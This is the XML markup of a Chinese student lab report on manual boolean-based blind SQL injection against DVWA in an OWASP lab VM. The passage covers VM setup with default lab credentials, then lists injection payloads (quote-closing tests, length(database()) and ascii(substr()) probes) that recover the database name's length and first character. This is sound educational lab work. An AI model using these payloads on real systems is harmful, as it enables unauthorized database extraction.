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28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>《软件安全》实验报告</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
        </w:rPr>
        <w:t>姓名：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>冯思程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
        </w:rPr>
        <w:t xml:space="preserve">     学号：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2112213</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
        </w:rPr>
        <w:t xml:space="preserve">   班级： </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>计算机科学与技术二班</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b/>
        </w:rPr>
        <w:t>实验名称：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SQL盲注</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b/>
        </w:rPr>
        <w:t>实验要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
        </w:rPr>
        <w:t>基于DVWA里的SQL盲注案例，实施手工盲注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>参考课本，撰写实验报告</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b/>
        </w:rPr>
        <w:t>实验过程：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="527" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>首先进行环境的配置：</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首先在百度网盘中找到OWASP安装压缩包下载，然后解压到电脑上，如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="2573020"/>
            <wp:effectExtent l="0" t="0" r="4445" b="177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272405" cy="2573020"/>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然后用VMware打开，选择到OWASP的解压路径，打开vmx文件，如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="2886710"/>
            <wp:effectExtent l="0" t="0" r="7620" b="889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5269230" cy="288671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启动虚拟机（靶机），等待一阵后，进行登录，用户名是root，密码是给出的owaspbwa，如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="3133090"/>
            <wp:effectExtent l="0" t="0" r="7620" b="1016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5269230" cy="3133090"/>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登陆后会给出你可以用来访问的地址,地址是：192.168.220.130，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>如下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266055" cy="3006725"/>
            <wp:effectExtent l="0" t="0" r="10795" b="317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5266055" cy="3006725"/>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然后在本机登录网址，成功出现owasp界面，如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="2481580"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1397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8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5270500" cy="2481580"/>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然后在界面下方的training application中找到DVWA，点击，弹出登录界面，然后输入用户名和密码，这里用户名和密码都输入user即可，登录成功后如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="3647440"/>
            <wp:effectExtent l="0" t="0" r="6985" b="1016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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5269865" cy="3647440"/>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然后在左边的选择条中找到DVWA security将安全等级设置为low，如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="3282315"/>
            <wp:effectExtent l="0" t="0" r="10160" b="1333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0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5266690" cy="3282315"/>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现在提前的准备工作已经做好，可以开始进一步的SQL盲注实验部分，点击左侧选择条中的SQL Injection（Blind）即可开始进行实验，如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="2141855"/>
            <wp:effectExtent l="0" t="0" r="4445" b="1079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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5272405" cy="2141855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="527" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>首先进行bool盲注：</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1）首先判断是否存在注入，并判断注入的类型是字符型还是数字型：</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输入1，结果如下，显示存在：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5162550" cy="2098675"/>
            <wp:effectExtent l="0" t="0" r="0" b="1587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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5162550" cy="2098675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>输入 1' and 1=1 #，单引号为了闭合原来 SQL 语句中的第一个单引号，而后面的#为了</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>闭合后面的单引号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，显示存在，如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="2042160"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1524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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5271135" cy="2042160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>输入 1' and 1=2 #，显示不存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="1480820"/>
            <wp:effectExtent l="0" t="0" r="4445" b="508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4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5272405" cy="1480820"/>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说明是字符型的注入。</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点页面右下角 View Source，来查看源代码，发现确实没有对id进行处理：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266055" cy="2515235"/>
            <wp:effectExtent l="0" t="0" r="10795" b="1841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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5266055" cy="2515235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>注入得到当前数据库名字：</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想要猜解数据库名，首先要猜解数据库名的长度，然后挨个猜解字符。</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输入 1' and length(database())=1 #，显示不存在；</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输入 1' and length(database())=2 #，显示不存在；</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输入 1' and length(database())=3 #，显示不存在；</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输入 1' and length(database())=4 #，显示存在，如下图：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="2049780"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5269230" cy="2049780"/>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说明数据库名字的长度是4.</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然后进行数据库名字的猜解，这里采用对ascii码进行二分法来逐步猜解判断，步骤如下：</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输入 1' and ascii(substr(datab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>se(),1,1))&gt;97 #，显示存在，说明数据库名的第一个</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字符的 ascii 值大于 97（小写字母 a 的 ascii 值）；</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输入 1' and ascii(substr(datab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>se(),1,1))&lt;122 #，显示存在，说明数据库名的第一</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个字符的 ascii 值小于 122（小写字母 z 的 ascii 值）；</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输入 1' and ascii(substr(datab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>se(),1,1))&lt;109 #，显示存在，说明数据库名的第一</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个字符的 ascii 值小于 109（小写字母 m 的 ascii 值）；</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输入 1' and ascii(substr(datab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>se(),1,1))&lt;103 #，显示存在，说明数据库名的第一</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个字符的 ascii 值小于 103（小写字母 g 的 ascii 值）；</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输入 1' and ascii(substr(datab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>se(),1,1))&lt;100 #，显示不存在，说明数据库名的第</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一个字符的 ascii 值不小于 100（小写字母 d 的 ascii 值）；</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输入 1' and ascii(substr(datab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>se(),1,1))&gt;100 #，显示不存在，说明数据库名的第</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一个字符的ascii值不大于100（小写字母d的ascii值），所以数据库名的第一个字符的ascii</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值为 100，即小写字母 d。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="楷体" w:hAnsi="楷体" w:eastAsia="楷体" w:cs="楷体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="1972310"/>
            <wp:effectExtent l="0" t="0" r="5715" b="889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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5271135" cy="1972310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
